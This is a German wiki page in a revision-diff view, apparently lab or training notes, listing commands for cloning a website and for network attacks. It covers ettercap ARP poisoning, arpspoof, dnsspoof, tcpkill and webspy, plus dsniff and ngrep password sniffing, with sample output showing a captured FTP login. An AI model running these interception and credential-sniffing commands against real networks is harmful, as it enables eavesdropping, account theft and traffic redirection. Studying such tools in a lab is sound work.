Hacking: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
Thomas (Diskussion | Beiträge) |
Thomas (Diskussion | Beiträge) |
||
| Zeile 1: | Zeile 1: | ||
| + | =webseite spiegeln= | ||
| + | apt-get install apache2 | ||
| + | cd /var/www/ | ||
| + | rm -r html | ||
| + | ==abziehen der Seite== | ||
| + | wget -l 1 -r http://www.schmeich.de | ||
| + | mv http://www.schmeich.de html | ||
| + | *besser mit browser | ||
| + | |||
| + | |||
| + | |||
=ettercap= | =ettercap= | ||
http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/ | http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/ | ||
Version vom 13. Oktober 2015, 07:28 Uhr
webseite spiegeln
apt-get install apache2 cd /var/www/ rm -r html
abziehen der Seite
wget -l 1 -r http://www.schmeich.de mv http://www.schmeich.de html *besser mit browser
ettercap
http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/
dsniff
Dsniff Tools
Installation unter Ubuntu oder Debian
apt-get install dsniff
Passwörter spionieren mit dsniff - Beispiele
Dsniff
sniffen dsniff -n -i eth1 -s 1500 host 85.10.194.199 -w geheim.dat auswerten dsniff -r geheim.dat ----------------- 02/06/07 18:51:34 tcp sagittarion.alpha.quadrant.46200 -> neelix.talaxia.de.21 (ftp) USER wuschel PASS suxa optionen -n = numerische Ausgabe -i eth1 = Schnittstelle -s 1500 = Länge des Mitschnittes pro Paket -w geheim.dat = schreibe in die Datei host 85.10.194.199 = Muster wie bei tcpdump -r geheim.dat = lese aus der Datei
Tcpkill
tcpkill port 80 optionen port 80 = Muster wie bei tcpdump
Arpspoof
arpspoof -t 192.168.254.7 192.168.254.5 optionen -t 192.168.254.7 = Angriffszeil 192.168.254.5 = Mac Adresse wird mit lokaler MacAdresse vertauscht
Webspy
mozilla& webspy 192.168.254.22
Dnsspoof
Der Nameserver muss umgeleitet werden ettercap -T -q -M ARP /192.168.254.22/ /192.168.254.4/ hosts anlegen 192.168.254.4 www.xinux.de dnsspoofen dnsspoof -f hosts
Ngrep
Installation unter Ubuntu oder Debian
apt-get install ngrep
Passwörter spionieren mit ngrep - Beispiele
sniffen ngrep -d eth1 -s 1500 -l -i 'PASS|USER' port 21
optionen -d eth1 = Schnittstelle -s 1500 = Länge des Mitschnittes pro Paket -l = Ausgabe wird zeilenweise gepuffert -i = Ignoriere Gross und Kleinschreibung 'PASS|USER' = Suchmuster in den Daten PASS oder USER port 21 = Muster wie bei tcpdump